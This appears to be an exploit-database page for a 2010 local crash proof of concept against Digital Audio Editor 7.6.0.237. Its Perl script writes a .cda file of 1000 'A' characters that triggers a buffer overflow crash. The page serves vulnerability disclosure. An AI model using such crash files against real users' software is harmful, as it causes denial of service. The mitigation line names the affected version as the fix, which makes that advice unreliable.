header-logo
Suggest Exploit
vendor:
Digital Audio Editor
by:
h1ch4m
7,8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Digital Audio Editor
Affected Version From: 7.6.0.237
Affected Version To: 7.6.0.237
Patch Exists: Yes
Related CWE: N/A
CPE: audioeditor.us/dae/index.htm
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

Digital Audio Editor 7.6.0.237 Local Crash PoC

This exploit is a proof of concept for a buffer overflow vulnerability in Digital Audio Editor 7.6.0.237. The vulnerability is triggered when a specially crafted .cda file is opened, causing the application to crash. The exploit code creates a file with 1000 A characters, which when opened in Digital Audio Editor 7.6.0.237, causes the application to crash.

Mitigation:

Update to the latest version of Digital Audio Editor 7.6.0.237.
Source

Exploit-DB raw data:

####
####
####Exploit Title: Digital Audio Editor 7.6.0.237 Local Crash PoC
####Software Link: http://www.audioeditor.us/dae/index.htm
####Tested on: Win XP SP3
####Date: 15-12-2010
####Author:  h1ch4m
####Email: h1ch4m@live.fr
####
####

my $file= "1.cda";
my $junk = "\x41" x 1000;
open($FILE,">$file");
print $FILE $junk;
close($FILE);
print "File Created successfully\n";
sleep(1);

Navigation

Suggest Exploit

Services By CQR